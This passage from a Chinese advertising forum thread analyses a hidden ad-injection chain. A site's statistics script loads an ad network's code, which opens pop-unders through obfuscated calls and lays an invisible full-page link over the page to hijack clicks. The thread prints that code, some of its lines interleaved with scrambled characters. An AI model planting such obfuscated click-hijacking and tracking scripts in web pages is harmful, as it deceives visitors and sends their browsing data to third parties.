  380.                 } catch(e) {}
    & b$ H2 T& Q6 f5 w
  381.             }
    . I2 K; o- C- Z# k% R( v# R  J
  382.         }, " v' n: d- T/ {( B. ~9 f7 w' q/ n7 p! i
  383.         120); , n* ~6 @' Y+ P8 c
  384.         a.onclick = function(e) { + F4 [; O: b# Z% Y" g4 ]: V
  385.             if (document.getElementById('__unionsky_push_d_object_box__') != null) { ( y2 n# b% ^9 F/ |# C+ f' @  v
  386.                 form_div.parentNode.removeChild(form_div)
      X+ j2 T+ |1 ^
  387.             } % I2 I( g% t2 q1 k9 a% |9 \
  388.             e = e || window.event; : w& ^; I, v: `
  389.             e.cancelBubble = true; & W5 T" Z: N, X/ _( x; k7 A
  390.             setTimeout(function() { 3 O! X3 }: K$ Y0 _* \" f
  391.                 a.parentNode.removeChild(a)
    * A, ?$ j- n9 ?0 i
  392.             }, + J6 t/ i/ v( S4 t" O: {$ I% M
  393.             200);
    ) }* x$ W$ J& X# W1 [7 K% L: Q, f. c
  394.             clearInterval(m);
      M' F9 x0 I" L! p
  395.             ads++; $ M! v6 |! B6 d! D! A+ d3 J; B
  396.             p(ckn, ckt, ads) 6 v! R9 L* x5 o* ]% }
  397.         };
    - D% L! D& Z7 o, t' o
  398.         event(a, 'mouseup',
    . }% J: _( I% X
  399.         function(e) { - {6 u8 N& _& B  `
  400.             e = e || window.event; . G, Z* j6 n4 p- p5 I# F; U
  401.             e.cancelBubble = true
    $ R& E8 M- T; R1 ]7 B# D
  402.         })
    % L1 O' r0 |5 `0 ^% r. g
  403.     }
    : J4 T) Z; y! r  c
  404.     function func(url, param) {
    ; c' j+ R6 u8 N, M
  405.         var f = window[String.fromCharCode(111, 112, 101, 110)]; ! b( |4 N: t1 {
  406.         var w = f(url, '_blank', 'left=0,top=0,toolbar=yes,location=yes,status=yes,menubar=yes,scrollbars=yes,resizable=yes,width=' + screen.width + ',height=' + screen.height);
    3 t6 r# t$ n5 y  O' f% t' L# Y  F
  407.         if (w) {
    8 ~# ]6 I6 i% G+ m+ ?6 n
  408.             ads++; 3 T, Y% v6 r7 `' j4 l: G
  409.             p(ckn, ckt, ads) ! g6 d: q, b9 {. @
  410.         }; 6 L  V( C' L5 Y- t) O
  411.         return w
    " N3 ]4 v* f, K
  412.     }
    - L0 o. s+ q9 Q* \. e' I
  413.     function fstart(url) {
    , d4 l$ U# P+ r) h( B
  414.         init();
    9 [! g5 [8 V( v% P* [5 ^' L
  415.         if (_ct >= 0) { ' J% L* s1 w; j- y- {: }
  416.             ckn = "YITIAN_NUM";
    ( ]: H" |. [+ y! ^; |
  417.             ckt = _ct
    3 ^) N, h. e0 }% a( g
  418.         } else { 5 {7 k( E, ?' l  |
  419.             ckn = "YITIAN_ALL";
    " j& J7 o8 a, e/ N# m5 }# Y
  420.             ckt = Math.abs(_ct)
    9 m& s! N3 Z: b) E5 j! ?2 U
  421.         }
    9 o  I! K0 I5 m& k
  422.         if (ckt > 0) {
    $ h" ^3 X* }, }4 N7 {
  423.             if (b(ckn)) {
    ) w/ g% F/ \! H) b! k
  424.                 try { ) `0 w7 ]  J" }( H( q; x
  425.                     ads = parseFloat(b(ckn))
    ) b0 M* \- W+ M1 i
  426.                 } catch(q) {}
    * w- M8 H. u5 J5 \) I
  427.             } * t8 t. ~1 b! H+ f
  428.         } 2 C* @3 U3 M' I' D, b; g6 @
  429.         if ((ads > 0 && ckn == 'YITIAN_ALL') || ads >= ytpp_ads) { 1 ]9 D+ x% K9 }: S& @+ D
  430.             return
    ' m5 L: w/ d- S) o  x
  431.         } else {
    5 k! Y% c  C7 l# t' f
  432.             if (_le > 0) {
    ! a+ J. ~+ ]( a" H
  433.                 setTimeout(go(url), _le * 1000)
    / n* I# e+ E( M9 f: k" e
  434.             } else { 8 c5 r4 e: p- C7 S
  435.                 go(url)
    & Z7 I- u7 I  O  h2 d
  436.             }
    & Y% V* ]6 m& Q  t
  437.         } ' p* A6 A* `. P7 A& S4 t# a# S
  438.     }
    7 h/ N4 v4 e* W+ i+ q# ^$ I
  439.     function go(url) { & l0 |% ]. s' g& [% e" P- y5 I
  440.         if (_poo == 1) {
    8 R; x9 f- A+ K' k: n4 F
  441.             try {
    7 D7 b5 p. M9 J% T# l
  442.                 func(url) 2 p" L3 ?" m& q3 C5 c
  443.             } catch(q) {}
    $ Z) P. C/ q% c7 ~" ]2 X4 I7 r; o
  444.         } else if (_pco == 1) {
    , C; W; r  p( d
  445.             a_pop(url)
    $ E" x1 W+ t! F' e
  446.         } else { 4 G( ]5 s7 T9 B' m1 v4 j  P
  447.             if (_pd == 1) {
    2 g: h4 @5 x) [4 ^) I$ ?
  448.                 setTimeout(function() {   }1 Y( V. ]. h* N7 }) S
  449.                     pop(url, { 9 r+ D' V5 ]0 E. Z
  450.                         a: 1,
    ) ?: }9 L) {3 d+ @
  451.                         b: 2
    & x0 E) _/ N2 ^
  452.                     })
    : _3 K' i3 a  L
  453.                 },
    1 Q: l% B" t% e  A4 J  g
  454.                 300) 1 X! C6 v; u: j3 s. R  z. g- @
  455.             } 4 l1 ?8 p3 e9 [: ~3 U( J% v
  456.             if (_pd2 > Math.random()) { 9 U) s" i% u" I( F7 W8 \6 Q
  457.                 setTimeout(function() { . t& s7 Q8 m3 {5 w# ~9 w  A
  458.                     pop(url, {
    2 z' ~! c; J, d2 d9 w3 M$ F; n
  459.                         a: 1, 1 _! l( J% k3 d- U
  460.                         b: 2
    + ^5 Y) m7 \3 _4 _
  461.                     })
    2 u; A3 ~4 V8 J6 J. f. y# g8 k' s
  462.                 },
    1 c; f$ a+ k. W! z# F- K
  463.                 300) 9 C1 k/ a$ ^' m5 y+ j
  464.             } + z1 i8 ^6 {9 c+ Z' @
  465.             for (var i = 1; i <= 10; i++) {
    . ~  h! c4 T# P
  466.                 var n = i == 1 ? "": i; $ c" y: J" D/ x: f, l1 e+ w; }
  467.                 if (eval("_pt" + n + "b") > Math.random()) {
    ' U( @3 ?; x. {# B5 D
  468.                     setTimeout(function() { ! k) f3 ~( y* g0 @- @- n
  469.                         setTimeout(function() { + D9 P) U$ x5 ~8 e
  470.                             pop(url, { 8 b* a- }, t. c1 @, s. u
  471.                                 a: 1,
    9 u! m9 }2 ~4 i, {
  472.                                 b: 2
    : K4 t8 H, b; y* C* \
  473.                             })
    1 {6 N! M& c2 T& W! b" e
  474.                         },
    7 o3 T7 N  O" _+ s8 C
  475.                         300)
    4 }* s) R+ m. `2 r
  476.                     }, , W& t) a( s! b1 y: ~) r4 }
  477.                     parseInt(eval("_pt" + n + "a")) * 1000) , K% k5 c9 F4 J4 K) a7 j1 {* v
  478.                 }
    4 @( k% ^# X. E7 J. L6 _0 m
  479.             }
    9 ^' w' p5 P. ]6 w
  480.             if (_pc2 > Math.random()) {
    ) h3 k! c/ n# ~) R
  481.                 a_pop(url) 2 z* n( S* F6 Q8 P& f! |0 p! K
  482.             } 2 S0 P" u  z1 d: k5 `8 y/ V# u4 Z
  483.             if (_po > Math.random()) {
    ( ~" g: V. t% O( b9 I. L. T
  484.                 try {
    " y% j2 G+ V! b# D. @
  485.                     func(url) 9 E1 v- r: }% B% M5 F( o
  486.                 } catch(q) {} - K2 S; d; ]1 C: p. w5 O: [( B6 {
  487.             }   E! J- _% x! F, M  b8 @
  488.         } 9 G6 k6 D7 L5 S( b$ Q4 L4 Q* R4 D. O8 O
  489.     }; 2 I9 U6 E. W# F* _2 q
  490.     fstart(aa_url);
    & Y1 i: _* c4 H, w6 \& n! N; I
  491.     event(window, 'beforeunload',
    ) O/ ]) ]" J" [) j5 M( N
  492.     function() {})
    ( g4 v* x0 c4 Q
  493. })();
复制代码
通过浏览器抓包
& ]( S0 Y) I( F1 BURL从这里产生
' y, Y% ?9 Y& ~3 j2 K- n/ ~4 {/ M- C% ~- s! \* X. h
http://play.unionsky.cn/show/?placeid=141830; s; n3 H4 |, X$ S2 w* X9 ~) B+ ]
2 V" c" u$ r. c/ K

# h( Q' e7 g; x/ |2 s; e* o
相关帖子
回复

使用道具 举报

126

主题

62

广告币

394

积分

初级会员

Rank: 2

积分
394

社区QQ达人

 楼主| 发表于 2013-12-17 15:04:10 | 显示全部楼层
直接打开看不到什么东西
2 l) `* V8 \% X' r- l( @http://www.unionsky.cn/ 是属于这个广告联盟的/ h; K8 a& N: X. H
我们直接分析抓包的内容
8 T. z! H* E: }+ k
var ytpp_r = encodeURIComponent(encodeURIComponent(document.referrer));
. t2 z6 d" o- K+ L; h2 Z* ]ytpp_r = ytpp_r.length > 1000 ? ytpp_r.substring(0, 1000) : ytpp_r; 8 x* ~* P0 ]& i! A  h; c4 z
var ytpp_u = encodeURIComponent(navigator.userAgent); 0 x3 X' B! L9 Q% P5 C
var ytpp_s = window.screen.width + "*" + window.screen.height;
/ }4 B. m: H" g6 t! l3 u5 avar ytpp_l = navigator.browserLanguage || navigator.language;
+ o/ x7 B1 g, R! [, A& z9 uvar ytpp_plid = 141830; 0 E3 ~( y/ ?3 A9 S( E
var ytpp_w = 0; 3 ]+ Y0 A- b% J+ ^) V) V# A" `
var ytpp_h = 0; 1 g4 G4 `8 W. E* @( `# J
var ytpp_url = "http://www.lxting.com/jmp/?p=f7xNjUO8Y80tB6KZyJ*jzRXjLuoZaOluHDv/IndJK1Z/mc0eKhM2QddlbEorugPwTAd08JIi*oDNYfaUSsF7QNBk3/CB3LW8&r=" + ytpp_r + "&u=" + ytpp_u + "&s=" + ytpp_s + "&l=" + ytpp_l + "&n=" + Math.random();
1 a( P0 p+ Y7 h: h# C* X- lvar ytpp_ads = 14; - P' D/ n9 B- C: ^' n6 w! _6 n! T
var ytpp_sti = 'CT:-3D:1C:1C2:1T:60,1T2:100,1;'; 9 h' {( L5 j3 l
document.write("<script language='javascript' type='text/javascript' src='http://www.lxting.com/pp/?p=f7xNjUO8Y81LybptxG2Vq//rYbtxQcP5GVnJOL07Ka8=&r=" + ytpp_r + "&u=" + ytpp_u + "&s=" + ytpp_s + "&l=" + ytpp_l + "&n=" + Math.random() + "'></script>");
! ]- j" |6 |) {, ~6 }' n! P, Tdocument.write("<script language='javascript' type='text/javascript' src='http://www.lxting.com/script/popup/v1_min.js'></script>");
- d  d+ p5 R/ i
那么这个http://play.unionsky.cn/show/?placeid=141830又是从哪里被引用进去呢。! X3 W9 {9 x' M9 J2 |" l$ ]
继续分析 发现这里
7 S# m& n$ x; t$ d7 A" V) y- x3 ?+ L0 s1 u5 f: S
http://txsite.21tx.com/count/count.js
0 U* h- O( |) Q) ~
$ G2 L) u3 u# M$ N- O$ c
txcount_uid = 1;
; E7 _9 o: G3 E* C- C# h+ m: L4 Mtxcount_uh = 0; 9 d: Y2 L" @: _; y  H
txcount_uw = 0; 8 e( _% R. @/ l  d! J7 I8 `
txcount_uah = 0;   p& t9 V9 g7 d. {9 a8 G
txcount_uaw = 0;
  g* B8 a5 }( T* f/ E. qtxcount_ucd = 0;
; Z' R* Y2 O, \# E# N- G1 E   # {3 m1 i% G8 G6 w, s
if (window.screen) {
# u- ~. k6 E9 H! |0 _  txcount_uh = window.screen.height;
% ^, A, @$ X; g# t* a  txcount_uw = window.screen.width; ) V$ o& J3 m. A! ?& q% E7 B& t
  txcount_uah = window.screen.availHeight; 4 c" r6 U& G/ h! t
  txcount_uaw = window.screen.availWidth; 3 G$ \1 [) r# }- j! l
  txcount_ucd = window.screen.colorDepth; . _  w# Q3 P! w8 O$ }/ L* K7 M
} % ~) I! b0 |) o! j) G/ k) G
   / }0 W  r' e/ Q2 p" l7 w, x" i4 k7 g1 V
   
. ?+ {4 [- _% e! L6 Mvar url = "http://txsite.21tx.com/count/count.aspx";
* z1 Q1 |/ U5 w5 c+ ?4 P' O* Nurl = url + "?u="+ txcount_uid; 8 O8 b% K' h  T7 v5 f4 }+ ]
//url = url + "&f=" + txcount_f;
- D0 O' w2 e1 d9 Z3 q; B7 Qurl = url + "&k=" + txsite_pagekey;
2 @( V  `* r+ |( y+ E//url = url + "&t=" + txcount_t; . w/ E/ h4 p. K5 I9 s8 C% M
url = url + "&l=" + escape(document.location);
5 l  M  @9 U0 K* I7 Hurl = url + "&r=" + escape(document.referrer);
/ X1 a$ i$ o" E$ l8 H" ourl = url + "&uh=" + txcount_uh; * O; `' l$ ]# ?3 y' s
url = url + "&uw=" + txcount_uw;
8 y: o5 A" v7 }" P+ jurl = url + "&uah=" + txcount_uah;
! a9 B3 D/ [' |9 [5 e; h3 x4 O% ~url = url + "&uaw=" + txcount_uaw; ; u/ ]) b' m5 ^3 m# m& q* }* L4 j
url = url + "&ucd=" + txcount_ucd; 1 m1 }9 K6 s2 [7 N( B5 u  }
   
! N$ t! T2 x  U' ^4 G) F   
2 h, ~8 |0 `# D5 W. Vdocument.write("<script src=" + url + "><\/script>"); 1 b2 b! @, U' x! `2 O' x+ b+ J+ [
//document.write('<script src="http://s4.cnzz.com/stat.php?id=4820460&web_id=4820460" language="JavaScript" charset="gb2312"><\/script>'); " m9 D# U# y1 ]. w2 q$ e
   
) w. Z- [, i/ Y' S, {document.write('<script src="http://s127.cnzz.com/stat.php?id=1474936&web_id=1474936" language="JavaScript" charset="gb2312"><\/script>'); / Q% _& U+ e3 `% i0 Z
   % h& y# V+ a  N; b$ X
   ) F4 n7 @2 D/ d
document.write("<script language='javascript' src='http://play.unionsky.cn/show/?placeid=141830'><\/script>");
& s1 k' }3 ]$ t( W6 G
+ Y( e$ D& d2 Q* v6 I3 }' z
一切昭然天下了。7 R% D9 m  C7 e1 w  _- ^- Q
代码产生的直接效果如下
2 j$ {  V; T* ]. r, K# p
2 E3 g4 @) |! X- n9 x2 Z <a  target="_blank" style="position: absolute; z-index: 2147483647; display: block; top: 0px; left: 0px; cursor: default; opacity: 0;"><div style="background-color: rgb(255, 255, 255); width: 1903px; height: 650px;"></div></a>
5 @; S6 q; X  O4 ?* c* A+ R3 b! W( i0 B: f: t7 p7 ]
很隐秘的一段好代码
& R/ @3 ^" o* m7 Q5 {* J* s$ j! u
回复 支持 反对

使用道具 举报

0

主题

488

广告币

1280

积分

高级会员

Rank: 4

积分
1280
发表于 2013-12-17 15:31:30 | 显示全部楼层
标记一下 好象看不懂还
回复 支持 反对

使用道具 举报

31

主题

266

广告币

801

积分

中级会员

Rank: 3Rank: 3

积分
801
发表于 2013-12-17 16:34:22 | 显示全部楼层
不清楚国内,莫非做taobao不可以直接用弹窗吗?
回复 支持 反对

使用道具 举报

4

主题

1333

广告币

1390

积分

高级会员

Rank: 4

积分
1390
发表于 2013-12-17 18:49:06 | 显示全部楼层
没用 360 搜狗 直接就拦截了,chrome可以弹出来
回复 支持 反对

使用道具 举报

54

主题

9

广告币

6010

积分

禁止访问

积分
6010
发表于 2013-12-17 19:34:38 | 显示全部楼层
adblock 完美屏蔽
回复 支持 反对

使用道具 举报

0

主题

91

广告币

97

积分

初级会员

Rank: 2

积分
97

社区QQ达人

发表于 2013-12-17 23:34:52 | 显示全部楼层
没研究全,期待跟多解析。
过往.
回复 支持 反对

使用道具 举报

6

主题

682

广告币

1090

积分

中级会员

Rank: 3Rank: 3

积分
1090

社区QQ达人

发表于 2013-12-18 00:52:13 | 显示全部楼层
代码看不懂,不过觉得挺好用的……自动弹窗
回复 支持 反对

使用道具 举报

52

主题

456

广告币

842

积分

中级会员

Rank: 3Rank: 3

积分
842
发表于 2013-12-18 01:24:03 | 显示全部楼层
没懂
& j5 g) \* \. \3 B4 c$ ]
) Z% I5 j; z/ D  h- a1,首次访问有个弹窗,但是被chrome给拦截了% k9 c  B; h( I) ^0 c" A
! Q& s7 @* V5 J. F$ y8 W! J. D% b2 s
2,劫持了第一次点击
4 u5 u$ |3 ~, K% X5 f) i# F4 V4 m! w8 }8 _, ~  ]
3,CS了一下unionsky$ ~3 Z6 ~. j# N- v( ~0 |% Q
  e- H4 O- m9 R1 ?1 h
然后?
回复 支持 反对

使用道具 举报

126

主题

62

广告币

394

积分

初级会员

Rank: 2

积分
394

社区QQ达人

 楼主| 发表于 2013-12-18 03:49:31 | 显示全部楼层
cissss 发表于 2013-12-18 01:24
! k  c$ y8 L0 ]+ ?, Y' |没懂
9 y, \6 W# d, E  L% \# S% x7 r1 t5 Z' V% Y9 D
1,首次访问有个弹窗,但是被chrome给拦截了

1 J& ]- |' ~% T懂的人一看就懂 不懂的人怎么看就不懂
回复 支持 反对

使用道具 举报

4

主题

439

广告币

717

积分

中级会员

Rank: 3Rank: 3

积分
717
发表于 2013-12-18 06:34:13 | 显示全部楼层
这个CJ怎么搞的这么复杂...
回复 支持 反对

使用道具 举报

52

主题

456

广告币

842

积分

中级会员

Rank: 3Rank: 3

积分
842
发表于 2013-12-18 17:31:57 | 显示全部楼层
小狠 发表于 2013-12-18 03:49
$ G4 x" \/ ^' c; ~6 v  T9 \* R0 P懂的人一看就懂 不懂的人怎么看就不懂

- f3 w8 ^+ I! l% C& r8 h! d我确实不懂你发这贴的意思。 可以理解为装逼么?
回复 支持 反对

使用道具 举报

0

主题

386

广告币

341

积分

初级会员

Rank: 2

积分
341

社区QQ达人

发表于 2014-3-14 13:10:39 | 显示全部楼层
不就是个弹窗代码吗?
回复 支持 反对

使用道具 举报

3

主题

88

广告币

113

积分

初级会员

Rank: 2

积分
113

社区QQ达人

发表于 2014-3-14 23:11:34 | 显示全部楼层
我表示看不懂
回复 支持 反对

使用道具 举报

4

主题

1

广告币

135

积分

初级会员

Rank: 2

积分
135

社区QQ达人

QQ
发表于 2014-3-15 12:03:35 | 显示全部楼层
占位,慢慢领会啥意思
http://faaad.com
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

关于我们|联系我们|DMCA|广告服务|小黑屋|手机版|Archiver|Github|网站地图|AdvertCN

GMT+8, 2026-4-4 17:47 , Processed in 0.056208 second(s), 14 queries , Gzip On, MemCache On.

Copyright © 2001-2023, AdvertCN

Proudly Operating in Hong Kong.

快速回复 返回顶部 返回列表